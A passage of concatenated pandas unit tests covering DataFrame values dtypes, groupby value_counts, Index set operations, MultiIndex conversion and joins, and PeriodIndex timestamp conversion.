Timestamp("2013-01-03 00:00:00"),
],
[
Timestamp("2013-01-01 00:00:00-0500", tz="US/Eastern"),
NaT,
Timestamp("2013-01-03 00:00:00-0500", tz="US/Eastern"),
],
[
Timestamp("2013-01-01 00:00:00+0100", tz="CET"),
NaT,
Timestamp("2013-01-03 00:00:00+0100", tz="CET"),
],
],
dtype=object,
).T
tm.assert_numpy_array_equal(result, expected)
def test_values_interleave_non_unique_cols(self):
df = DataFrame(
[[Timestamp("20130101"), 3.5], [Timestamp("20130102"), 4.5]],
columns=["x", "x"],
index=[1, 2],
)
df_unique = df.copy()
df_unique.columns = ["x", "y"]
assert df_unique.values.shape == df.values.shape
tm.assert_numpy_array_equal(df_unique.values[0], df.values[0])
tm.assert_numpy_array_equal(df_unique.values[1], df.values[1])
def test_values_numeric_cols(self, float_frame):
float_frame["foo"] = "bar"
values = float_frame[["A", "B", "C", "D"]].values
assert values.dtype == np.float64
def test_values_lcd(self, mixed_float_frame, mixed_int_frame):
# mixed lcd
values = mixed_float_frame[["A", "B", "C", "D"]].values
assert values.dtype == np.float64
values = mixed_float_frame[["A", "B", "C"]].values
assert values.dtype == np.float32
values = mixed_float_frame[["C"]].values
assert values.dtype == np.float16
# GH#10364
# B uint64 forces float because there are other signed int types
values = mixed_int_frame[["A", "B", "C", "D"]].values
assert values.dtype == np.float64
values = mixed_int_frame[["A", "D"]].values
assert values.dtype == np.int64
# B uint64 forces float because there are other signed int types
values = mixed_int_frame[["A", "B", "C"]].values
assert values.dtype == np.float64
# as B and C are both unsigned, no forcing to float is needed
values = mixed_int_frame[["B", "C"]].values
assert values.dtype == np.uint64
values = mixed_int_frame[["A", "C"]].values
assert values.dtype == np.int32
values = mixed_int_frame[["C", "D"]].values
assert values.dtype == np.int64
values = mixed_int_frame[["A"]].values
assert values.dtype == np.int32
values = mixed_int_frame[["C"]].values
assert values.dtype == np.uint8
class TestPrivateValues:
@td.skip_array_manager_invalid_test
def test_private_values_dt64tz(self):
dta = date_range("2000", periods=4, tz="US/Central")._data.reshape(-1, 1)
df = DataFrame(dta, columns=["A"])
tm.assert_equal(df._values, dta)
# we have a view
assert np.shares_memory(df._values._ndarray, dta._ndarray)
# TimedeltaArray
tda = dta - dta
df2 = df - df
tm.assert_equal(df2._values, tda)
@td.skip_array_manager_invalid_test
def test_private_values_dt64tz_multicol(self):
dta = date_range("2000", periods=8, tz="US/Central")._data.reshape(-1, 2)
df = DataFrame(dta, columns=["A", "B"])
tm.assert_equal(df._values, dta)
# we have a view
assert np.shares_memory(df._values._ndarray, dta._ndarray)
# TimedeltaArray
tda = dta - dta
df2 = df - df
tm.assert_equal(df2._values, tda)
def test_private_values_dt64_multiblock(self, using_array_manager, request):
if using_array_manager:
mark = pytest.mark.xfail(reason="returns ndarray")
request.node.add_marker(mark)
dta = date_range("2000", periods=8)._data
df = DataFrame({"A": dta[:4]}, copy=False)
df["B"] = dta[4:]
assert len(df._mgr.arrays) == 2
result = df._values
expected = dta.reshape(2, 4).T
tm.assert_equal(result, expected)
```
#### File: tests/groupby/test_value_counts.py
```python
from itertools import product
import numpy as np
import pytest
from pandas import (
Categorical,
CategoricalIndex,
DataFrame,
Grouper,
MultiIndex,
Series,
date_range,
to_datetime,
)
import pandas._testing as tm
# our starting frame
def seed_df(seed_nans, n, m):
np.random.seed(1234)
days = date_range("2015-08-24", periods=10)
frame = DataFrame(
{
"1st": np.random.choice(list("abcd"), n),
"2nd": np.random.choice(days, n),
"3rd": np.random.randint(1, m + 1, n),
}
)
if seed_nans:
frame.loc[1::11, "1st"] = np.nan
frame.loc[3::17, "2nd"] = np.nan
frame.loc[7::19, "3rd"] = np.nan
frame.loc[8::19, "3rd"] = np.nan
frame.loc[9::19, "3rd"] = np.nan
return frame
# create input df, keys, and the bins
binned = []
ids = []
for seed_nans in [True, False]:
for n, m in product((100, 1000), (5, 20)):
df = seed_df(seed_nans, n, m)
bins = None, np.arange(0, max(5, df["3rd"].max()) + 1, 2)
keys = "1st", "2nd", ["1st", "2nd"]
for k, b in product(keys, bins):
binned.append((df, k, b, n, m))
ids.append(f"{k}-{n}-{m}")
@pytest.mark.slow
@pytest.mark.parametrize("df, keys, bins, n, m", binned, ids=ids)
@pytest.mark.parametrize("isort", [True, False])
@pytest.mark.parametrize("normalize", [True, False])
@pytest.mark.parametrize("sort", [True, False])
@pytest.mark.parametrize("ascending", [True, False])
@pytest.mark.parametrize("dropna", [True, False])
def test_series_groupby_value_counts(
df, keys, bins, n, m, isort, normalize, sort, ascending, dropna
):
def rebuild_index(df):
arr = list(map(df.index.get_level_values, range(df.index.nlevels)))
df.index = MultiIndex.from_arrays(arr, names=df.index.names)
return df
kwargs = {
"normalize": normalize,
"sort": sort,
"ascending": ascending,
"dropna": dropna,
"bins": bins,
}
gr = df.groupby(keys, sort=isort)
left = gr["3rd"].value_counts(**kwargs)
gr = df.groupby(keys, sort=isort)
right = gr["3rd"].apply(Series.value_counts, **kwargs)
right.index.names = right.index.names[:-1] + ["3rd"]
# have to sort on index because of unstable sort on values
left, right = map(rebuild_index, (left, right)) # xref GH9212
tm.assert_series_equal(left.sort_index(), right.sort_index())
def test_series_groupby_value_counts_with_grouper():
# GH28479
df = DataFrame(
{
"Timestamp": [
1565083561,
1565083561 + 86400,
1565083561 + 86500,
1565083561 + 86400 * 2,
1565083561 + 86400 * 3,
1565083561 + 86500 * 3,
1565083561 + 86400 * 4,
],
"Food": ["apple", "apple", "banana", "banana", "orange", "orange", "pear"],
}
).drop([3])
df["Datetime"] = to_datetime(df["Timestamp"].apply(lambda t: str(t)), unit="s")
dfg = df.groupby(Grouper(freq="1D", key="Datetime"))
# have to sort on index because of unstable sort on values xref GH9212
result = dfg["Food"].value_counts().sort_index()
expected = dfg["Food"].apply(Series.value_counts).sort_index()
expected.index.names = result.index.names
tm.assert_series_equal(result, expected)
@pytest.mark.parametrize("columns", [["A", "B"], ["A", "B", "C"]])
def test_series_groupby_value_counts_empty(columns):
# GH39172
df = DataFrame(columns=columns)
dfg = df.groupby(columns[:-1])
result = dfg[columns[-1]].value_counts()
expected = Series([], name=columns[-1], dtype=result.dtype)
expected.index = MultiIndex.from_arrays([[]] * len(columns), names=columns)
tm.assert_series_equal(result, expected)
@pytest.mark.parametrize("columns", [["A", "B"], ["A", "B", "C"]])
def test_series_groupby_value_counts_one_row(columns):
# GH42618
df = DataFrame(data=[range(len(columns))], columns=columns)
dfg = df.groupby(columns[:-1])
result = dfg[columns[-1]].value_counts()
expected = df.value_counts().rename(columns[-1])
tm.assert_series_equal(result, expected)
def test_series_groupby_value_counts_on_categorical():
# GH38672
s = Series(Categorical(["a"], categories=["a", "b"]))
result = s.groupby([0]).value_counts()
expected = Series(
data=[1, 0],
index=MultiIndex.from_arrays(
[
[0, 0],
CategoricalIndex(
["a", "b"], categories=["a", "b"], ordered=False, dtype="category"
),
]
),
name=0,
)
# Expected:
# 0 a 1
# b 0
# Name: 0, dtype: int64
tm.assert_series_equal(result, expected)
```
#### File: indexes/base_class/test_constructors.py
```python
import numpy as np
import pytest
from pandas import (
Index,
MultiIndex,
)
import pandas._testing as tm
class TestIndexConstructor:
# Tests for the Index constructor, specifically for cases that do
# not return a subclass
@pytest.mark.parametrize("value", [1, np.int64(1)])
def test_constructor_corner(self, value):
# corner case
msg = (
r"Index\(\.\.\.\) must be called with a collection of some "
f"kind, {value} was passed"
)
with pytest.raises(TypeError, match=msg):
Index(value)
@pytest.mark.parametrize("index_vals", [[("A", 1), "B"], ["B", ("A", 1)]])
def test_construction_list_mixed_tuples(self, index_vals):
# see gh-10697: if we are constructing from a mixed list of tuples,
# make sure that we are independent of the sorting order.
index = Index(index_vals)
assert isinstance(index, Index)
assert not isinstance(index, MultiIndex)
def test_constructor_wrong_kwargs(self):
# GH #19348
with pytest.raises(TypeError, match="Unexpected keyword arguments {'foo'}"):
with tm.assert_produces_warning(FutureWarning):
Index([], foo="bar")
def test_constructor_cast(self):
msg = "could not convert string to float"
with pytest.raises(ValueError, match=msg):
Index(["a", "b", "c"], dtype=float)
```
#### File: indexes/base_class/test_pickle.py
```python
from pandas import Index
import pandas._testing as tm
def test_pickle_preserves_object_dtype():
# GH#43188, GH#43155 don't infer numeric dtype
index = Index([1, 2, 3], dtype=object)
result = tm.round_trip_pickle(index)
assert result.dtype == object
tm.assert_index_equal(index, result)
```
#### File: indexes/base_class/test_setops.py
```python
from datetime import datetime
import numpy as np
import pytest
import pandas as pd
from pandas import (
Index,
Series,
)
import pandas._testing as tm
from pandas.core.algorithms import safe_sort
class TestIndexSetOps:
@pytest.mark.parametrize(
"method", ["union", "intersection", "difference", "symmetric_difference"]
)
def test_setops_disallow_true(self, method):
idx1 = Index(["a", "b"])
idx2 = Index(["b", "c"])
with pytest.raises(ValueError, match="The 'sort' keyword only takes"):
getattr(idx1, method)(idx2, sort=True)
def test_setops_preserve_object_dtype(self):
idx = Index([1, 2, 3], dtype=object)
result = idx.intersection(idx[1:])
expected = idx[1:]
tm.assert_index_equal(result, expected)
# if other is not monotonic increasing, intersection goes through
# a different route
result = idx.intersection(idx[1:][::-1])
tm.assert_index_equal(result, expected)
result = idx._union(idx[1:], sort=None)
expected = idx
tm.assert_numpy_array_equal(result, expected.values)
result = idx.union(idx[1:], sort=None)
tm.assert_index_equal(result, expected)
# if other is not monotonic increasing, _union goes through
# a different route
result = idx._union(idx[1:][::-1], sort=None)
tm.assert_numpy_array_equal(result, expected.values)
result = idx.union(idx[1:][::-1], sort=None)
tm.assert_index_equal(result, expected)
def test_union_base(self):
index = Index([0, "a", 1, "b", 2, "c"])
first = index[3:]
second = index[:5]
result = first.union(second)
expected = Index([0, 1, 2, "a", "b", "c"])
tm.assert_index_equal(result, expected)
@pytest.mark.parametrize("klass", [np.array, Series, list])
def test_union_different_type_base(self, klass):
# GH 10149
index = Index([0, "a", 1, "b", 2, "c"])
first = index[3:]
second = index[:5]
result = first.union(klass(second.values))
assert tm.equalContents(result, index)
def test_union_sort_other_incomparable(self):
# https://github.com/pandas-dev/pandas/issues/24959
idx = Index([1, pd.Timestamp("2000")])
# default (sort=None)
with tm.assert_produces_warning(RuntimeWarning):
result = idx.union(idx[:1])
tm.assert_index_equal(result, idx)
# sort=None
with tm.assert_produces_warning(RuntimeWarning):
result = idx.union(idx[:1], sort=None)
tm.assert_index_equal(result, idx)
# sort=False
result = idx.union(idx[:1], sort=False)
tm.assert_index_equal(result, idx)
@pytest.mark.xfail(reason="GH#25151 need to decide on True behavior")
def test_union_sort_other_incomparable_true(self):
# TODO(GH#25151): decide on True behaviour
# sort=True
idx = Index([1, pd.Timestamp("2000")])
with pytest.raises(TypeError, match=".*"):
idx.union(idx[:1], sort=True)
@pytest.mark.xfail(reason="GH#25151 need to decide on True behavior")
def test_intersection_equal_sort_true(self):
# TODO(GH#25151): decide on True behaviour
idx = Index(["c", "a", "b"])
sorted_ = Index(["a", "b", "c"])
tm.assert_index_equal(idx.intersection(idx, sort=True), sorted_)
def test_intersection_base(self, sort):
# (same results for py2 and py3 but sortedness not tested elsewhere)
index = Index([0, "a", 1, "b", 2, "c"])
first = index[:5]
second = index[:3]
expected = Index([0, 1, "a"]) if sort is None else Index([0, "a", 1])
result = first.intersection(second, sort=sort)
tm.assert_index_equal(result, expected)
@pytest.mark.parametrize("klass", [np.array, Series, list])
def test_intersection_different_type_base(self, klass, sort):
# GH 10149
index = Index([0, "a", 1, "b", 2, "c"])
first = index[:5]
second = index[:3]
result = first.intersection(klass(second.values), sort=sort)
assert tm.equalContents(result, second)
def test_intersection_nosort(self):
result = Index(["c", "b", "a"]).intersection(["b", "a"])
expected = Index(["b", "a"])
tm.assert_index_equal(result, expected)
def test_intersection_equal_sort(self):
idx = Index(["c", "a", "b"])
tm.assert_index_equal(idx.intersection(idx, sort=False), idx)
tm.assert_index_equal(idx.intersection(idx, sort=None), idx)
def test_intersection_str_dates(self, sort):
dt_dates = [datetime(2012, 2, 9), datetime(2012, 2, 22)]
i1 = Index(dt_dates, dtype=object)
i2 = Index(["aa"], dtype=object)
result = i2.intersection(i1, sort=sort)
assert len(result) == 0
@pytest.mark.parametrize(
"index2,expected_arr",
[(Index(["B", "D"]), ["B"]), (Index(["B", "D", "A"]), ["A", "B"])],
)
def test_intersection_non_monotonic_non_unique(self, index2, expected_arr, sort):
# non-monotonic non-unique
index1 = Index(["A", "B", "A", "C"])
expected = Index(expected_arr, dtype="object")
result = index1.intersection(index2, sort=sort)
if sort is None:
expected = expected.sort_values()
tm.assert_index_equal(result, expected)
def test_difference_base(self, sort):
# (same results for py2 and py3 but sortedness not tested elsewhere)
index = Index([0, "a", 1, "b", 2, "c"])
first = index[:4]
second = index[3:]
result = first.difference(second, sort)
expected = Index([0, "a", 1])
if sort is None:
expected = Index(safe_sort(expected))
tm.assert_index_equal(result, expected)
def test_symmetric_difference(self):
# (same results for py2 and py3 but sortedness not tested elsewhere)
index = Index([0, "a", 1, "b", 2, "c"])
first = index[:4]
second = index[3:]
result = first.symmetric_difference(second)
expected = Index([0, 1, 2, "a", "c"])
tm.assert_index_equal(result, expected)
@pytest.mark.parametrize(
"method,expected,sort",
[
(
"intersection",
np.array(
[(1, "A"), (2, "A"), (1, "B"), (2, "B")],
dtype=[("num", int), ("let", "a1")],
),
False,
),
(
"intersection",
np.array(
[(1, "A"), (1, "B"), (2, "A"), (2, "B")],
dtype=[("num", int), ("let", "a1")],
),
None,
),
(
"union",
np.array(
[(1, "A"), (1, "B"), (1, "C"), (2, "A"), (2, "B"), (2, "C")],
dtype=[("num", int), ("let", "a1")],
),
None,
),
],
)
def test_tuple_union_bug(self, method, expected, sort):
index1 = Index(
np.array(
[(1, "A"), (2, "A"), (1, "B"), (2, "B")],
dtype=[("num", int), ("let", "a1")],
)
)
index2 = Index(
np.array(
[(1, "A"), (2, "A"), (1, "B"), (2, "B"), (1, "C"), (2, "C")],
dtype=[("num", int), ("let", "a1")],
)
)
result = getattr(index1, method)(index2, sort=sort)
assert result.ndim == 1
expected = Index(expected)
tm.assert_index_equal(result, expected)
@pytest.mark.parametrize("first_list", [["b", "a"], []])
@pytest.mark.parametrize("second_list", [["a", "b"], []])
@pytest.mark.parametrize(
"first_name, second_name, expected_name",
[("A", "B", None), (None, "B", None), ("A", None, None)],
)
def test_union_name_preservation(
self, first_list, second_list, first_name, second_name, expected_name, sort
):
first = Index(first_list, name=first_name)
second = Index(second_list, name=second_name)
union = first.union(second, sort=sort)
vals = set(first_list).union(second_list)
if sort is None and len(first_list) > 0 and len(second_list) > 0:
expected = Index(sorted(vals), name=expected_name)
tm.assert_index_equal(union, expected)
else:
expected = Index(vals, name=expected_name)
tm.equalContents(union, expected)
@pytest.mark.parametrize(
"diff_type, expected",
[["difference", [1, "B"]], ["symmetric_difference", [1, 2, "B", "C"]]],
)
def test_difference_object_type(self, diff_type, expected):
# GH 13432
idx1 = Index([0, 1, "A", "B"])
idx2 = Index([0, 2, "A", "C"])
result = getattr(idx1, diff_type)(idx2)
expected = Index(expected)
tm.assert_index_equal(result, expected)
```
#### File: indexes/datetimelike_/test_is_monotonic.py
```python
from pandas import (
Index,
NaT,
date_range,
)
def test_is_monotonic_with_nat():
# GH#31437
# PeriodIndex.is_monotonic should behave analogously to DatetimeIndex,
# in particular never be monotonic when we have NaT
dti = date_range("2016-01-01", periods=3)
pi = dti.to_period("D")
tdi = Index(dti.view("timedelta64[ns]"))
for obj in [pi, pi._engine, dti, dti._engine, tdi, tdi._engine]:
if isinstance(obj, Index):
# i.e. not Engines
assert obj.is_monotonic
assert obj.is_monotonic_increasing
assert not obj.is_monotonic_decreasing
assert obj.is_unique
dti1 = dti.insert(0, NaT)
pi1 = dti1.to_period("D")
tdi1 = Index(dti1.view("timedelta64[ns]"))
for obj in [pi1, pi1._engine, dti1, dti1._engine, tdi1, tdi1._engine]:
if isinstance(obj, Index):
# i.e. not Engines
assert not obj.is_monotonic
assert not obj.is_monotonic_increasing
assert not obj.is_monotonic_decreasing
assert obj.is_unique
dti2 = dti.insert(3, NaT)
pi2 = dti2.to_period("H")
tdi2 = Index(dti2.view("timedelta64[ns]"))
for obj in [pi2, pi2._engine, dti2, dti2._engine, tdi2, tdi2._engine]:
if isinstance(obj, Index):
# i.e. not Engines
assert not obj.is_monotonic
assert not obj.is_monotonic_increasing
assert not obj.is_monotonic_decreasing
assert obj.is_unique
```
#### File: datetimes/methods/test_isocalendar.py
```python
from pandas import (
DataFrame,
DatetimeIndex,
)
import pandas._testing as tm
def test_isocalendar_returns_correct_values_close_to_new_year_with_tz():
# GH#6538: Check that DatetimeIndex and its TimeStamp elements
# return the same weekofyear accessor close to new year w/ tz
dates = ["2013/12/29", "2013/12/30", "2013/12/31"]
dates = DatetimeIndex(dates, tz="Europe/Brussels")
result = dates.isocalendar()
expected_data_frame = DataFrame(
[[2013, 52, 7], [2014, 1, 1], [2014, 1, 2]],
columns=["year", "week", "day"],
index=dates,
dtype="UInt32",
)
tm.assert_frame_equal(result, expected_data_frame)
```
#### File: indexes/datetimes/test_asof.py
```python
from datetime import timedelta
from pandas import (
Index,
Timestamp,
date_range,
isna,
)
import pandas._testing as tm
class TestAsOf:
def test_asof_partial(self):
index = date_range("2010-01-01", periods=2, freq="m")
expected = Timestamp("2010-02-28")
result = index.asof("2010-02")
assert result == expected
assert not isinstance(result, Index)
def test_asof(self):
index = tm.makeDateIndex(100)
dt = index[0]
assert index.asof(dt) == dt
assert isna(index.asof(dt - timedelta(1)))
dt = index[-1]
assert index.asof(dt + timedelta(1)) == dt
dt = index[0].to_pydatetime()
assert isinstance(index.asof(dt), Timestamp)
```
#### File: indexes/multi/test_conversion.py
```python
import numpy as np
import pytest
import pandas as pd
from pandas import (
DataFrame,
MultiIndex,
)
import pandas._testing as tm
def test_to_numpy(idx):
result = idx.to_numpy()
exp = idx.values
tm.assert_numpy_array_equal(result, exp)
def test_to_frame():
tuples = [(1, "one"), (1, "two"), (2, "one"), (2, "two")]
index = MultiIndex.from_tuples(tuples)
result = index.to_frame(index=False)
expected = DataFrame(tuples)
tm.assert_frame_equal(result, expected)
result = index.to_frame()
expected.index = index
tm.assert_frame_equal(result, expected)
tuples = [(1, "one"), (1, "two"), (2, "one"), (2, "two")]
index = MultiIndex.from_tuples(tuples, names=["first", "second"])
result = index.to_frame(index=False)
expected = DataFrame(tuples)
expected.columns = ["first", "second"]
tm.assert_frame_equal(result, expected)
result = index.to_frame()
expected.index = index
tm.assert_frame_equal(result, expected)
# See GH-22580
index = MultiIndex.from_tuples(tuples)
result = index.to_frame(index=False, name=["first", "second"])
expected = DataFrame(tuples)
expected.columns = ["first", "second"]
tm.assert_frame_equal(result, expected)
result = index.to_frame(name=["first", "second"])
expected.index = index
expected.columns = ["first", "second"]
tm.assert_frame_equal(result, expected)
msg = "'name' must be a list / sequence of column names."
with pytest.raises(TypeError, match=msg):
index.to_frame(name="first")
msg = "'name' should have same length as number of levels on index."
with pytest.raises(ValueError, match=msg):
index.to_frame(name=["first"])
# Tests for datetime index
index = MultiIndex.from_product([range(5), pd.date_range("20130101", periods=3)])
result = index.to_frame(index=False)
expected = DataFrame(
{
0: np.repeat(np.arange(5, dtype="int64"), 3),
1: np.tile(pd.date_range("20130101", periods=3), 5),
}
)
tm.assert_frame_equal(result, expected)
result = index.to_frame()
expected.index = index
tm.assert_frame_equal(result, expected)
# See GH-22580
result = index.to_frame(index=False, name=["first", "second"])
expected = DataFrame(
{
"first": np.repeat(np.arange(5, dtype="int64"), 3),
"second": np.tile(pd.date_range("20130101", periods=3), 5),
}
)
tm.assert_frame_equal(result, expected)
result = index.to_frame(name=["first", "second"])
expected.index = index
tm.assert_frame_equal(result, expected)
def test_to_frame_dtype_fidelity():
# GH 22420
mi = MultiIndex.from_arrays(
[
pd.date_range("19910905", periods=6, tz="US/Eastern"),
[1, 1, 1, 2, 2, 2],
pd.Categorical(["a", "a", "b", "b", "c", "c"], ordered=True),
["x", "x", "y", "z", "x", "y"],
],
names=["dates", "a", "b", "c"],
)
original_dtypes = {name: mi.levels[i].dtype for i, name in enumerate(mi.names)}
expected_df = DataFrame(
{
"dates": pd.date_range("19910905", periods=6, tz="US/Eastern"),
"a": [1, 1, 1, 2, 2, 2],
"b": pd.Categorical(["a", "a", "b", "b", "c", "c"], ordered=True),
"c": ["x", "x", "y", "z", "x", "y"],
}
)
df = mi.to_frame(index=False)
df_dtypes = df.dtypes.to_dict()
tm.assert_frame_equal(df, expected_df)
assert original_dtypes == df_dtypes
def test_to_frame_resulting_column_order():
# GH 22420
expected = ["z", 0, "a"]
mi = MultiIndex.from_arrays(
[["a", "b", "c"], ["x", "y", "z"], ["q", "w", "e"]], names=expected
)
result = mi.to_frame().columns.tolist()
assert result == expected
def test_to_flat_index(idx):
expected = pd.Index(
(
("foo", "one"),
("foo", "two"),
("bar", "one"),
("baz", "two"),
("qux", "one"),
("qux", "two"),
),
tupleize_cols=False,
)
result = idx.to_flat_index()
tm.assert_index_equal(result, expected)
```
#### File: indexes/multi/test_join.py
```python
import numpy as np
import pytest
from pandas import (
Index,
Interval,
MultiIndex,
)
import pandas._testing as tm
@pytest.mark.parametrize(
"other", [Index(["three", "one", "two"]), Index(["one"]), Index(["one", "three"])]
)
def test_join_level(idx, other, join_type):
join_index, lidx, ridx = other.join(
idx, how=join_type, level="second", return_indexers=True
)
exp_level = other.join(idx.levels[1], how=join_type)
assert join_index.levels[0].equals(idx.levels[0])
assert join_index.levels[1].equals(exp_level)
# pare down levels
mask = np.array([x[1] in exp_level for x in idx], dtype=bool)
exp_values = idx.values[mask]
tm.assert_numpy_array_equal(join_index.values, exp_values)
if join_type in ("outer", "inner"):
join_index2, ridx2, lidx2 = idx.join(
other, how=join_type, level="second", return_indexers=True
)
assert join_index.equals(join_index2)
tm.assert_numpy_array_equal(lidx, lidx2)
tm.assert_numpy_array_equal(ridx, ridx2)
tm.assert_numpy_array_equal(join_index2.values, exp_values)
def test_join_level_corner_case(idx):
# some corner cases
index = Index(["three", "one", "two"])
result = index.join(idx, level="second")
assert isinstance(result, MultiIndex)
with pytest.raises(TypeError, match="Join.*MultiIndex.*ambiguous"):
idx.join(idx, level=1)
def test_join_self(idx, join_type):
joined = idx.join(idx, how=join_type)
tm.assert_index_equal(joined, idx)
def test_join_multi():
# GH 10665
midx = MultiIndex.from_product([np.arange(4), np.arange(4)], names=["a", "b"])
idx = Index([1, 2, 5], name="b")
# inner
jidx, lidx, ridx = midx.join(idx, how="inner", return_indexers=True)
exp_idx = MultiIndex.from_product([np.arange(4), [1, 2]], names=["a", "b"])
exp_lidx = np.array([1, 2, 5, 6, 9, 10, 13, 14], dtype=np.intp)
exp_ridx = np.array([0, 1, 0, 1, 0, 1, 0, 1], dtype=np.intp)
tm.assert_index_equal(jidx, exp_idx)
tm.assert_numpy_array_equal(lidx, exp_lidx)
tm.assert_numpy_array_equal(ridx, exp_ridx)
# flip
jidx, ridx, lidx = idx.join(midx, how="inner", return_indexers=True)
tm.assert_index_equal(jidx, exp_idx)
tm.assert_numpy_array_equal(lidx, exp_lidx)
tm.assert_numpy_array_equal(ridx, exp_ridx)
# keep MultiIndex
jidx, lidx, ridx = midx.join(idx, how="left", return_indexers=True)
exp_ridx = np.array(
[-1, 0, 1, -1, -1, 0, 1, -1, -1, 0, 1, -1, -1, 0, 1, -1], dtype=np.intp
)
tm.assert_index_equal(jidx, midx)
assert lidx is None
tm.assert_numpy_array_equal(ridx, exp_ridx)
# flip
jidx, ridx, lidx = idx.join(midx, how="right", return_indexers=True)
tm.assert_index_equal(jidx, midx)
assert lidx is None
tm.assert_numpy_array_equal(ridx, exp_ridx)
def test_join_self_unique(idx, join_type):
if idx.is_unique:
joined = idx.join(idx, how=join_type)
assert (idx == joined).all()
def test_join_multi_wrong_order():
# GH 25760
# GH 28956
midx1 = MultiIndex.from_product([[1, 2], [3, 4]], names=["a", "b"])
midx2 = MultiIndex.from_product([[1, 2], [3, 4]], names=["b", "a"])
join_idx, lidx, ridx = midx1.join(midx2, return_indexers=True)
exp_ridx = np.array([-1, -1, -1, -1], dtype=np.intp)
tm.assert_index_equal(midx1, join_idx)
assert lidx is None
tm.assert_numpy_array_equal(ridx, exp_ridx)
def test_join_multi_return_indexers():
# GH 34074
midx1 = MultiIndex.from_product([[1, 2], [3, 4], [5, 6]], names=["a", "b", "c"])
midx2 = MultiIndex.from_product([[1, 2], [3, 4]], names=["a", "b"])
result = midx1.join(midx2, return_indexers=False)
tm.assert_index_equal(result, midx1)
def test_join_overlapping_interval_level():
# GH 44096
idx_1 = MultiIndex.from_tuples(
[
(1, Interval(0.0, 1.0)),
(1, Interval(1.0, 2.0)),
(1, Interval(2.0, 5.0)),
(2, Interval(0.0, 1.0)),
(2, Interval(1.0, 3.0)), # interval limit is here at 3.0, not at 2.0
(2, Interval(3.0, 5.0)),
],
names=["num", "interval"],
)
idx_2 = MultiIndex.from_tuples(
[
(1, Interval(2.0, 5.0)),
(1, Interval(0.0, 1.0)),
(1, Interval(1.0, 2.0)),
(2, Interval(3.0, 5.0)),
(2, Interval(0.0, 1.0)),
(2, Interval(1.0, 3.0)),
],
names=["num", "interval"],
)
expected = MultiIndex.from_tuples(
[
(1, Interval(0.0, 1.0)),
(1, Interval(1.0, 2.0)),
(1, Interval(2.0, 5.0)),
(2, Interval(0.0, 1.0)),
(2, Interval(1.0, 3.0)),
(2, Interval(3.0, 5.0)),
],
names=["num", "interval"],
)
result = idx_1.join(idx_2, how="outer")
tm.assert_index_equal(result, expected)
```
#### File: period/methods/test_insert.py
```python
import numpy as np
import pytest
from pandas import (
NaT,
PeriodIndex,
period_range,
)
import pandas._testing as tm
class TestInsert:
@pytest.mark.parametrize("na", [np.nan, NaT, None])
def test_insert(self, na):
# GH#18295 (test missing)
expected = PeriodIndex(["2017Q1", NaT, "2017Q2", "2017Q3", "2017Q4"], freq="Q")
result = period_range("2017Q1", periods=4, freq="Q").insert(1, na)
tm.assert_index_equal(result, expected)
```
#### File: period/methods/test_is_full.py
```python
import pytest
from pandas import PeriodIndex
def test_is_full():
index = PeriodIndex([2005, 2007, 2009], freq="A")
assert not index.is_full
index = PeriodIndex([2005, 2006, 2007], freq="A")
assert index.is_full
index = PeriodIndex([2005, 2005, 2007], freq="A")
assert not index.is_full
index = PeriodIndex([2005, 2005, 2006], freq="A")
assert index.is_full
index = PeriodIndex([2006, 2005, 2005], freq="A")
with pytest.raises(ValueError, match="Index is not monotonic"):
index.is_full
assert index[:0].is_full
```
#### File: period/methods/test_to_timestamp.py
```python
from datetime import datetime
import numpy as np
import pytest
from pandas import (
DatetimeIndex,
NaT,
PeriodIndex,
Timedelta,
Timestamp,
date_range,
period_range,
)
import pandas._testing as tm
class TestToTimestamp:
def test_to_timestamp_non_contiguous(self):
# GH#44100
dti = date_range("2021-10-18", periods=9, freq="B")
pi = dti.to_period()
result = pi[::2].to_timestamp()
expected = dti[::2]
tm.assert_index_equal(result, expected)
result = pi._data[::2].to_timestamp()
expected = dti._data[::2]
# TODO: can we get the freq to round-trip?
tm.assert_datetime_array_equal(result, expected, check_freq=False)
result = pi[::-1].to_timestamp()
expected = dti[::-1]
tm.assert_index_equal(result, expected)
result = pi._data[::-1].to_timestamp()
expected = dti._data[::-1]
tm.assert_datetime_array_equal(result, expected, check_freq=False)
result = pi[::2][::-1].to_timestamp()
expected = dti[::2][::-1]
tm.assert_index_equal(result, expected)
result = pi._data[::2][::-1].to_timestamp()
expected = dti._data[::2][::-1]
tm.assert_datetime_array_equal(result, expected, check_freq=False)
def test_to_timestamp_freq(self):
idx = period_range("2017", periods=12, freq="A-DEC")
result = idx.to_timestamp()
expected = date_range("2017", periods=12, freq="AS-JAN")
tm.assert_index_equal(result, expected)
def test_to_timestamp_pi_nat(self):
# GH#7228
index = PeriodIndex(["NaT", "2011-01", "2011-02"], freq="M", name="idx")
result = index.to_timestamp("D")
expected = DatetimeIndex(
[NaT, datetime(2011, 1, 1), datetime(2011, 2, 1)], name="idx"
)
tm.assert_index_equal(result, expected)
assert result.name == "idx"
result2 = result.to_period(freq="M")
tm.assert_index_equal(result2, index)
assert result2.name == "idx"
result3 = result.to_period(freq="3M")
exp = PeriodIndex(["NaT", "2011-01", "2011-02"], freq="3M", name="idx")
tm.assert_index_equal(result3, exp)
assert result3.freqstr == "3M"
msg = "Frequency must be positive, because it represents span: -2A"
with pytest.raises(ValueError, match=msg):
result.to_period(freq="-2A")
def test_to_timestamp_preserve_name(self):
index = period_range(freq="A", start="1/1/2001", end="12/1/2009", name="foo")
assert index.name == "foo"
conv = index.to_timestamp("D")
assert conv.name == "foo"
def test_to_timestamp_quarterly_bug(self):
years = np.arange(1960, 2000).repeat(4)
quarters = np.tile(list(range(1, 5)), 40)
pindex = PeriodIndex(year=years, quarter=quarters)
stamps = pindex.to_timestamp("D", "end")
expected = DatetimeIndex([x.to_timestamp("D", "end") for x in pindex])
tm.assert_index_equal(stamps, expected)
assert stamps.freq == expected.freq
def test_to_timestamp_pi_mult(self):
idx = PeriodIndex(["2011-01", "NaT", "2011-02"], freq="2M", name="idx")
result = idx.to_timestamp()
expected = DatetimeIndex(["2011-01-01", "NaT", "2011-02-01"], name="idx")
tm.assert_index_equal(result, expected)
result = idx.to_timestamp(how="E")
expected = DatetimeIndex(["2011-02-28", "NaT", "2011-03-31"], name="idx")
expected = expected + Timedelta(1, "D") - Timedelta(1, "ns")
tm.assert_index_equal(result, expected)
def test_to_timestamp_pi_combined(self):
idx = period_range(start="2011", periods=2, freq="1D1H", name="idx")
result = idx.to_timestamp()
expected = DatetimeIndex(["2011-01-01 00:00", "2011-01-02 01:00"], name="idx")
tm.assert_index_equal(result, expected)
result = idx.to_timestamp(how="E")
expected = DatetimeIndex(
